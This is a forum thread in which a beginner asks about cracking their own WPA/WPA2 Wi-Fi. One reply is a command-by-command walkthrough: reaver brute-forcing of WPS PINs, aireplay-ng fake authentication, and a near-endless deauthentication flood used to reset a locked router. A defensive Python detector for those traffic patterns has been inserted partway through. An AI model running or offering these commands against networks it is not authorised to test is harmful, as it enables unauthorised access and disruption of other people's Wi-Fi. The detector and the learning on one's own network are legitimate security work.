WPA/WPA2 hacking

Hi! I’m new to ethical hacking. I’m using Kali Linux to hack my own Wi-Fi network. I failed in the dictionary attack and the WPS attack. Can anyone help me with this?

1 Like

I do not know the answer, but I would like to follow this thread, since I’m a beginner myself and wanted to start with that too.

I have bought a second router for it, you? What’s your set-up?

Ever tried Airgeddon?

-Gaining Access - WPA & WPA2 Cracking - Exploiting WPS:

Reaver:
Run the wash command to get all WPS-enabled routers within range:
wash -i wlan0
Then run the next command against the target:

reaver --bssid 11:22:33:44:55:66 --channel 11 -i wlan0
(bssid)

When you get the message "failed to associate with 11:22:33:44:55:66",
run airodump-ng and tell it not to associate with this BSSID, because we are going to do this manually.
Split the screen and give the command:

aireplay-ng --fakeauth 100 -a 11:22:33:44:55:66 -h 00:11:22:33:44:55 wlan0
(mac target) (own mac)

Then go back to the first terminal and run the command:

reaver --bssid 11:22:33:44:55:66 --channel 1 -i wlan0 -A

Run this command, go to the next terminal and run the deauth attack again.
Now it tries to bruteforce the pin.

In case reaver still doesn’t give any information after this, run the same command but add -vvv (verbose) to produce verbose output, so it gives as much information as possible about what’s happening in the background.

reaver --bssid 11:22:33:44:55:66 --channel 1 -i wlan0 -A -vvv

Run both commands again:

(reaver --bssid 11:22:33:44:55:66 --channel 1 -i wlan0 -A -vvv)

(aireplay-ng --fakeauth 100 -a 11:22:33:44:55:66 -h 00:11:22:33:44:55 wlan0)

(in split screen) Run it a little bit, then Ctrl-C both terminals to stop and analyze the output.
You can see that reaver is retrying the same pin again and again, and the WPS transaction failed after sending the NACK packets.
Then you can look for help by doing reaver --help to see the options. Scrolling down you see the option -N or --no-nacks. This option tells reaver not to send NACK messages when out-of-order packets are received.
Now, run the same commands again and add the option --no-nacks:

aireplay-ng --fakeauth 100 -a 11:22:33:44:55:66 -h 00:11:22:33:44:55 wlan0

reaver --bssid 11:22:33:44:55:66 --channel 1 -i wlan0 -A -vvv --no-nacks

Now you see that reaver will not try the same pin again, but a different pin each time without any errors.

-WPS lock: (if the pin is set manually, not the factory setting)
Run the wash command: wash -i wlan0
Then run reaver:
reaver -b 00:11:22:33:44:55 -c 11 -i wlan0
Now reaver is trying all possible combinations of the pin. This can take a long time, even hours.
Some routers will lock WPS after trying to crack the pin a couple of times. Most routers do not. But if a router gets locked, you have to wait till the router unlocks. Sometimes it takes a minute or hours, but sometimes it can take days before a router unlocks.
With a locked router, reaver will stop working. If you press Ctrl-C and run wash again, you can see that WPS is locked on the router. The simplest way to solve that problem is to deauth all the devices on the target, so they will think there is something wrong with the router and restart the router again:
aireplay-ng --deauth 1000000000000000000000 -a 00:11:22:33:44:55 wlan0
(long number to deauth a long time)
After the target reconnects, start reaver again.

1 Like
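The defender's view of the two traffic patterns the post above relies on (a deauthentication flood aimed at one BSSID, and a fakeauth loop sending repeated authentication requests from one client), as an added example that is not from the thread. The frame list, MAC addresses and thresholds are constructed placeholders, and the detector assumes management frames have already been decoded into (timestamp_ms, subtype, bssid, source) tuples.

```python
"""Flag deauth floods and authentication bursts in decoded 802.11 management frames."""
from collections import defaultdict, deque

# Constructed sample frames: (timestamp_ms, subtype, bssid, source_mac).
# MAC addresses are placeholders, not real devices.
AP = "AA:BB:CC:DD:EE:FF"
SAMPLE_FRAMES = (
    [(0, "beacon", AP, AP)]
    # 120 deauth frames "from the AP" in 2.4 s: a deauth flood
    + [(1000 + i * 20, "deauth", AP, AP) for i in range(120)]
    # 40 auth requests from one client in under 2 s: a fakeauth loop
    + [(3000 + i * 50, "auth", AP, "00:11:22:33:44:55") for i in range(40)]
    # a single auth request from another client: normal
    + [(8000, "auth", AP, "66:77:88:99:AA:BB")]
)


def sliding_bursts(frames, subtype, key, window_ms, threshold):
    """Return {key: peak_count} for keys whose `subtype` frames exceed
    `threshold` inside any `window_ms`-long sliding window."""
    recent = defaultdict(deque)
    peaks = {}
    for ts, st, bssid, src in sorted(frames):
        if st != subtype:
            continue
        k = key(bssid, src)
        q = recent[k]
        q.append(ts)
        while q and ts - q[0] > window_ms:  # drop frames outside the window
            q.popleft()
        if len(q) > threshold:
            peaks[k] = max(peaks.get(k, 0), len(q))
    return peaks


def detect_deauth_flood(frames, window_ms=2000, threshold=20):
    """A real AP sends a handful of deauth frames, not dozens per second for one BSSID."""
    return sliding_bursts(frames, "deauth", lambda bssid, src: bssid, window_ms, threshold)


def detect_auth_burst(frames, window_ms=5000, threshold=10):
    """Many authentication requests from one client to one AP within seconds."""
    return sliding_bursts(frames, "auth", lambda bssid, src: (src, bssid), window_ms, threshold)


if __name__ == "__main__":
    print("deauth floods:", detect_deauth_flood(SAMPLE_FRAMES))
    print("auth bursts:", detect_auth_burst(SAMPLE_FRAMES))
```

Thresholds are starting points; tune them against a capture of your own network's normal roaming and reconnect behaviour before alerting on them.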

What does this mean? What login page?
Can you explain your steps for how you capture a remote Wi-Fi password?

Ha! I’m sorry! I didn’t check this post.
This is a copy-paste from a text I wrote before, and the ettercap part is a mistake. I’m sorry for that!
I replaced it with the right text.

A little bit of a late reaction from me, but your information is very helpful! Thanks for sharing!